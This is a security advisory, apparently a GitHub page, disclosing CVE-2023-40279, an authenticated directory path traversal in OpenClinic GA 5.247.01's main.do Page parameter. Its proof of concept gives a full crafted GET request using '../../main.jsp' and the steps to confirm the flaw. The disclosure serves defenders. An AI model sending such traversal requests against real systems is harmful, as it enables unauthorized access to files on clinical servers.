Skip to content

Latest commit

 

History

History
46 lines (33 loc) · 2.54 KB

CVE-2023-40279_Authenticated-Directory-Path-Traversal_OpenClinic-GA_5.247.01_Report.md

File metadata and controls

46 lines (33 loc) · 2.54 KB

CVE-2023-40279: Authenticated Directory Path Traversal via main.do in OpenClinic GA 5.247.01

Abstract

A Directory Path Traversal vulnerability has been discovered in OpenClinic GA version 5.247.01, affecting the main.do component. This vulnerability enables authenticated attackers to traverse the server's directory structure via the Page parameter in a GET request, allowing for the unauthorized retrieval and execution of files from arbitrary directories.

Identification

CVE ID: CVE-2023-40279

Exploit Title: Authenticated Directory Path Traversal via main.do in OpenClinic GA 5.247.01

Date Discovered: 2023-08-14

Affected Software: OpenClinic GA version 5.247.01

Vendor: OpenClinic

Software Link: SourceForge Project Page

Tested Environments: Windows 10, Windows 11

Vulnerability Details

The vulnerability resides in the handling of the Page parameter within the main.do request. Improper validation of this parameter allows authenticated users to construct a GET request that can traverse directories and access or execute files outside the application's intended directories, posing a significant security risk.

Proof of Concept (PoC)

Steps to Reproduce:

1. Crafting the Malicious GET Request:
  Use a web browser or an HTTP request tool such as curl or Burp Suite.
  Construct the GET request as below, using ../../main.jsp to navigate directories and access main.jsp:
    GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1
    Host: 192.168.100.5:10088
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Connection: close
    Cookie: JSESSIONID=[SESSION ID]
    Cache-Control: max-age=0

  Replace [SESSION ID] with a valid session ID from an authenticated user session.

2. Confirming the Vulnerability:
  Send the crafted GET request to the server.
  If the server responds by providing the content of main.jsp or any file outside the intended directory, it confirms the existence of a directory path traversal vulnerability. This access could lead to the disclosure of sensitive information or facilitate more severe attacks.

Impact

By exploiting this vulnerability, attackers could potentially access sensitive system files or execute unauthorized actions on the server, leading to data breaches, system compromise, and a significant breach of security protocols.